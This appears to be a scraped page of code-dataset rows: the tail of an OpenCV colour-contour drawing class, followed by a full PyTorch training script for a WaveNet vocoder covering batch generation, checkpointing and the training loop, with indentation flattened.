cv2.inRange(frameHSV, self.red2_lower, self.red2_upper)
)
def dibujarContornos(self):
for mask in range(len(self.masks)):
(_,contornos,hierarchy) = cv2.findContours(self.masks[mask], cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
for pic, contour in enumerate(contornos):
if (cv2.contourArea(contour) > 600):
x,y,w,h = cv2.boundingRect(contour)
cv2.rectangle(self.frame,(x,y),(x+w,y+h), self.border_colors[mask], 3)
cv2.putText(self.frame, '{},{}'.format(x, y), (x+10, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, [255,255,0], 1, cv2.LINE_AA)
self.rects.append((mask, x, y, w, h))
def dibujarLinea(self):
cv2.line(self.frame, (0 , 230), (640 , 230), (100,155,30), 3)
def dibujarPunto(self, x, y):
cv2.circle(self.frame, (x,y), 7, (0, 255, 0), -1)
def destroy(self):
self.cap.release()
cv2.destroyAllWindows()
|
22,499 | dade373b631d4f6f373be560d81ef917ca9ea21c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import os
import sys
import time
from dateutil.relativedelta import relativedelta
from distutils.util import strtobool
import numpy as np
import six
import soundfile as sf
import torch
from sklearn.preprocessing import StandardScaler
from torch import nn
from torchvision import transforms
from wavenet_vocoder.nets import encode_mu_law
from wavenet_vocoder.nets import initialize
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.utils import background
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
def validate_length(x, y, upsampling_factor=None):
"""VALIDATE LENGTH.
Args:
x (ndarray): ndarray with x.shape[0] = len_x.
y (ndarray): ndarray with y.shape[0] = len_y.
upsampling_factor (int): Upsampling factor.
Returns:
ndarray: Length adjusted x with same length y.
ndarray: Length adjusted y with same length x.
"""
if upsampling_factor is None:
if x.shape[0] < y.shape[0]:
y = y[:x.shape[0]]
if x.shape[0] > y.shape[0]:
x = x[:y.shape[0]]
assert len(x) == len(y)
else:
if x.shape[0] > y.shape[0] * upsampling_factor:
x = x[:y.shape[0] * upsampling_factor]
if x.shape[0] < y.shape[0] * upsampling_factor:
mod_y = y.shape[0] * upsampling_factor - x.shape[0]
mod_y_frame = mod_y // upsampling_factor + 1
y = y[:-mod_y_frame]
x = x[:y.shape[0] * upsampling_factor]
assert len(x) == len(y) * upsampling_factor
return x, y
@background(max_prefetch=16)
def train_generator(wav_list, feat_list, receptive_field,
batch_length=None,
batch_size=1,
feature_type="world",
wav_transform=None,
feat_transform=None,
shuffle=True,
upsampling_factor=80,
use_upsampling_layer=True,
use_speaker_code=False):
"""GENERATE TRAINING BATCH.
Args:
wav_list (list): List of wav files.
feat_list (list): List of feat files.
receptive_field (int): Size of receptive filed.
batch_length (int): Batch length (if set None, utterance batch will be used.).
batch_size (int): Batch size (if batch_length = None, batch_size will be 1.).
feature_type (str): Auxiliary feature type.
wav_transform (func): Preprocessing function for waveform.
feat_transform (func): Preprocessing function for aux feats.
shuffle (bool): Whether to shuffle the file list.
upsampling_factor (int): Upsampling factor.
use_upsampling_layer (bool): Whether to use upsampling layer.
use_speaker_code (bool): Whether to use speaker code.
Returns:
generator: Generator instance.
"""
# shuffle list
if shuffle:
n_files = len(wav_list)
idx = np.random.permutation(n_files)
wav_list = [wav_list[i] for i in idx]
feat_list = [feat_list[i] for i in idx]
# check batch_length
if batch_length is not None and use_upsampling_layer:
batch_mod = (receptive_field + batch_length) % upsampling_factor
logging.warning("batch length is decreased due to upsampling (%d -> %d)" % (
batch_length, batch_length - batch_mod))
batch_length -= batch_mod
# show warning
if batch_length is None and batch_size > 1:
logging.warning("in utterance batch mode, batchsize will be 1.")
while True:
batch_x, batch_h, batch_t = [], [], []
# process over all of files
for wavfile, featfile in zip(wav_list, feat_list):
# load waveform and aux feature
x, fs = sf.read(wavfile, dtype=np.float32)
h = read_hdf5(featfile, "/" + feature_type)
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# check both lengths are same
logging.debug("before x length = %d" % x.shape[0])
logging.debug("before h length = %d" % h.shape[0])
if use_upsampling_layer:
x, h = validate_length(x, h, upsampling_factor)
else:
x, h = validate_length(x, h)
logging.debug("after x length = %d" % x.shape[0])
logging.debug("after h length = %d" % h.shape[0])
# ---------------------------------------
# use mini batch without upsampling layer
# ---------------------------------------
if batch_length is not None and not use_upsampling_layer:
# make buffer array
if "x_buffer" not in locals():
x_buffer = np.empty((0), dtype=np.float32)
h_buffer = np.empty((0, h.shape[1]), dtype=np.float32)
x_buffer = np.concatenate([x_buffer, x], axis=0)
h_buffer = np.concatenate([h_buffer, h], axis=0)
while len(x_buffer) > receptive_field + batch_length:
# get pieces
x_ = x_buffer[:receptive_field + batch_length]
h_ = h_buffer[:receptive_field + batch_length]
# perform pre-processing
if wav_transform is not None:
x_ = wav_transform(x_)
if feat_transform is not None:
h_ = feat_transform(h_)
# convert to torch variable
x_ = torch.from_numpy(x_).long()
h_ = torch.from_numpy(h_).float()
# remove the last and first sample for training
batch_x += [x_[:-1]] # (T)
batch_h += [h_[:-1].transpose(0, 1)] # (D x T)
batch_t += [x_[1:]] # (T)
# update buffer
x_buffer = x_buffer[batch_length:]
h_buffer = h_buffer[batch_length:]
# return mini batch
if len(batch_x) == batch_size:
batch_x = torch.stack(batch_x)
batch_h = torch.stack(batch_h)
batch_t = torch.stack(batch_t)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
batch_t = batch_t.cuda()
yield (batch_x, batch_h), batch_t
batch_x, batch_h, batch_t = [], [], []
# ------------------------------------
# use mini batch with upsampling layer
# ------------------------------------
elif batch_length is not None and use_upsampling_layer:
# make buffer array
if "x_buffer" not in locals():
x_buffer = np.empty((0), dtype=np.float32)
h_buffer = np.empty((0, h.shape[1]), dtype=np.float32)
x_buffer = np.concatenate([x_buffer, x], axis=0)
h_buffer = np.concatenate([h_buffer, h], axis=0)
while len(h_buffer) > (receptive_field + batch_length) // upsampling_factor:
# set batch size
h_bs = (receptive_field + batch_length) // upsampling_factor
x_bs = h_bs * upsampling_factor + 1
# get pieces
h_ = h_buffer[:h_bs]
x_ = x_buffer[:x_bs]
# perform pre-processing
if wav_transform is not None:
x_ = wav_transform(x_)
if feat_transform is not None:
h_ = feat_transform(h_)
# convert to torch variable
x_ = torch.from_numpy(x_).long()
h_ = torch.from_numpy(h_).float()
# remove the last and first sample for training
batch_h += [h_.transpose(0, 1)] # (D x T)
batch_x += [x_[:-1]] # (T)
batch_t += [x_[1:]] # (T)
# set shift size
h_ss = batch_length // upsampling_factor
x_ss = h_ss * upsampling_factor
# update buffer
h_buffer = h_buffer[h_ss:]
x_buffer = x_buffer[x_ss:]
# return mini batch
if len(batch_x) == batch_size:
batch_x = torch.stack(batch_x)
batch_h = torch.stack(batch_h)
batch_t = torch.stack(batch_t)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
batch_t = batch_t.cuda()
yield (batch_x, batch_h), batch_t
batch_x, batch_h, batch_t = [], [], []
# --------------------------------------------
# use utterance batch without upsampling layer
# --------------------------------------------
elif batch_length is None and not use_upsampling_layer:
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# convert to torch variable
x = torch.from_numpy(x).long()
h = torch.from_numpy(h).float()
# remove the last and first sample for training
batch_x = x[:-1].unsqueeze(0) # (1 x T)
batch_h = h[:-1].transpose(0, 1).unsqueeze(0) # (1 x D x T)
batch_t = x[1:].unsqueeze(0) # (1 x T)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
batch_t = batch_t.cuda()
yield (batch_x, batch_h), batch_t
# -----------------------------------------
# use utterance batch with upsampling layer
# -----------------------------------------
else:
# remove last frame
h = h[:-1]
x = x[:-upsampling_factor + 1]
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# convert to torch variable
x = torch.from_numpy(x).long()
h = torch.from_numpy(h).float()
# remove the last and first sample for training
batch_h = h.transpose(0, 1).unsqueeze(0) # (1 x D x T')
batch_x = x[:-1].unsqueeze(0) # (1 x T)
batch_t = x[1:].unsqueeze(0) # (1 x T)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
batch_t = batch_t.cuda()
yield (batch_x, batch_h), batch_t
# re-shuffle
if shuffle:
idx = np.random.permutation(n_files)
wav_list = [wav_list[i] for i in idx]
feat_list = [feat_list[i] for i in idx]
def save_checkpoint(checkpoint_dir, model, optimizer, iterations):
"""SAVE CHECKPOINT.
Args:
checkpoint_dir (str): Directory to save checkpoint.
model (torch.nn.Module): Pytorch model instance.
optimizer (torch.optim.optimizer): Pytorch optimizer instance.
iterations (int): Number of current iterations.
"""
checkpoint = {
"model": model.state_dict(),
"optimizer": optimizer.state_dict(),
"iterations": iterations}
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
torch.save(checkpoint, checkpoint_dir + "/checkpoint-%d.pkl" % iterations)
logging.info("%d-iter checkpoint created." % iterations)
def main():
"""RUN TRAINING."""
parser = argparse.ArgumentParser()
# path setting
parser.add_argument("--waveforms", required=True,
type=str, help="directory or list of wav files")
parser.add_argument("--feats", required=True,
type=str, help="directory or list of aux feat files")
parser.add_argument("--stats", required=True,
type=str, help="hdf5 file including statistics")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the model")
parser.add_argument("--feature_type", default="world", choices=["world", "melspc"],
type=str, help="feature type")
# network structure setting
parser.add_argument("--n_quantize", default=256,
type=int, help="number of quantization")
parser.add_argument("--n_aux", default=28,
type=int, help="number of dimension of aux feats")
parser.add_argument("--n_resch", default=512,
type=int, help="number of channels of residual output")
parser.add_argument("--n_skipch", default=256,
type=int, help="number of channels of skip output")
parser.add_argument("--dilation_depth", default=10,
type=int, help="depth of dilation")
parser.add_argument("--dilation_repeat", default=1,
type=int, help="number of repeating of dilation")
parser.add_argument("--kernel_size", default=2,
type=int, help="kernel size of dilated causal convolution")
parser.add_argument("--upsampling_factor", default=80,
type=int, help="upsampling factor of aux features")
parser.add_argument("--use_upsampling_layer", default=True,
type=strtobool, help="flag to use upsampling layer")
parser.add_argument("--use_speaker_code", default=False,
type=strtobool, help="flag to use speaker code")
# network training setting
parser.add_argument("--lr", default=1e-4,
type=float, help="learning rate")
parser.add_argument("--weight_decay", default=0.0,
type=float, help="weight decay coefficient")
parser.add_argument("--batch_length", default=20000,
type=int, help="batch length (if set 0, utterance batch will be used)")
parser.add_argument("--batch_size", default=1,
type=int, help="batch size (if use utterance batch, batch_size will be 1.")
parser.add_argument("--iters", default=200000,
type=int, help="number of iterations")
# other setting
parser.add_argument("--checkpoint_interval", default=10000,
type=int, help="how frequent saving model")
parser.add_argument("--intervals", default=100,
type=int, help="log interval")
parser.add_argument("--seed", default=1,
type=int, help="seed number")
parser.add_argument("--resume", default=None, nargs="?",
type=str, help="model path to restart training")
parser.add_argument("--n_gpus", default=1,
type=int, help="number of gpus")
parser.add_argument("--verbose", default=1,
type=int, help="log level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warning("logging is disabled.")
# show arguments
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# make experimental directory
if not os.path.exists(args.expdir):
os.makedirs(args.expdir)
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# fix slow computation of dilated conv
# https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
torch.backends.cudnn.benchmark = True
# save args as conf
torch.save(args, args.expdir + "/model.conf")
# define network
if args.use_upsampling_layer:
upsampling_factor = args.upsampling_factor
else:
upsampling_factor = 0
model = WaveNet(
n_quantize=args.n_quantize,
n_aux=args.n_aux,
n_resch=args.n_resch,
n_skipch=args.n_skipch,
dilation_depth=args.dilation_depth,
dilation_repeat=args.dilation_repeat,
kernel_size=args.kernel_size,
upsampling_factor=upsampling_factor)
logging.info(model)
model.apply(initialize)
model.train()
if args.n_gpus > 1:
device_ids = range(args.n_gpus)
model = torch.nn.DataParallel(model, device_ids)
model.receptive_field = model.module.receptive_field
if args.n_gpus > args.batch_size:
logging.warning("batch size is less than number of gpus.")
# define optimizer and loss
optimizer = torch.optim.Adam(
model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay)
criterion = nn.CrossEntropyLoss()
# define transforms
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/" + args.feature_type + "/mean")
scaler.scale_ = read_hdf5(args.stats, "/" + args.feature_type + "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, args.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
# define generator
if os.path.isdir(args.waveforms):
filenames = sorted(find_files(args.waveforms, "*.wav", use_dir_name=False))
wav_list = [args.waveforms + "/" + filename for filename in filenames]
feat_list = [args.feats + "/" + filename.replace(".wav", ".h5") for filename in filenames]
elif os.path.isfile(args.waveforms):
wav_list = read_txt(args.waveforms)
feat_list = read_txt(args.feats)
else:
logging.error("--waveforms should be directory or list.")
sys.exit(1)
assert len(wav_list) == len(feat_list)
logging.info("number of training data = %d." % len(wav_list))
generator = train_generator(
wav_list, feat_list,
receptive_field=model.receptive_field,
batch_length=args.batch_length,
batch_size=args.batch_size,
feature_type=args.feature_type,
wav_transform=wav_transform,
feat_transform=feat_transform,
shuffle=True,
upsampling_factor=args.upsampling_factor,
use_upsampling_layer=args.use_upsampling_layer,
use_speaker_code=args.use_speaker_code)
# charge minibatch in queue
while not generator.queue.full():
time.sleep(0.1)
# resume model and optimizer
if args.resume is not None and len(args.resume) != 0:
checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage)
iterations = checkpoint["iterations"]
if args.n_gpus > 1:
model.module.load_state_dict(checkpoint["model"])
else:
model.load_state_dict(checkpoint["model"])
optimizer.load_state_dict(checkpoint["optimizer"])
logging.info("restored from %d-iter checkpoint." % iterations)
else:
iterations = 0
# check gpu and then send to gpu
if torch.cuda.is_available():
model.cuda()
criterion.cuda()
for state in optimizer.state.values():
for key, value in state.items():
if torch.is_tensor(value):
state[key] = value.cuda()
else:
logging.error("gpu is not available. please check the setting.")
sys.exit(1)
# train
loss = 0
total = 0
for i in six.moves.range(iterations, args.iters):
start = time.time()
(batch_x, batch_h), batch_t = generator.next()
batch_output = model(batch_x, batch_h)
batch_loss = criterion(
batch_output[:, model.receptive_field:].contiguous().view(-1, args.n_quantize),
batch_t[:, model.receptive_field:].contiguous().view(-1))
optimizer.zero_grad()
batch_loss.backward()
optimizer.step()
loss += batch_loss.item()
total += time.time() - start
logging.debug("batch loss = %.3f (%.3f sec / batch)" % (
batch_loss.item(), time.time() - start))
# report progress
if (i + 1) % args.intervals == 0:
logging.info("(iter:%d) average loss = %.6f (%.3f sec / batch)" % (
i + 1, loss / args.intervals, total / args.intervals))
logging.info("estimated required time = "
"{0.days:02}:{0.hours:02}:{0.minutes:02}:{0.seconds:02}"
.format(relativedelta(
seconds=int((args.iters - (i + 1)) * (total / args.intervals)))))
loss = 0
total = 0
# save intermidiate model
if (i + 1) % args.checkpoint_interval == 0:
if args.n_gpus > 1:
save_checkpoint(args.expdir, model.module, optimizer, i + 1)
else:
save_checkpoint(args.expdir, model, optimizer, i + 1)
# save final model
if args.n_gpus > 1:
torch.save({"model": model.module.state_dict()}, args.expdir + "/checkpoint-final.pkl")
else:
torch.save({"model": model.state_dict()}, args.expdir + "/checkpoint-final.pkl")
logging.info("final checkpoint created.")
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.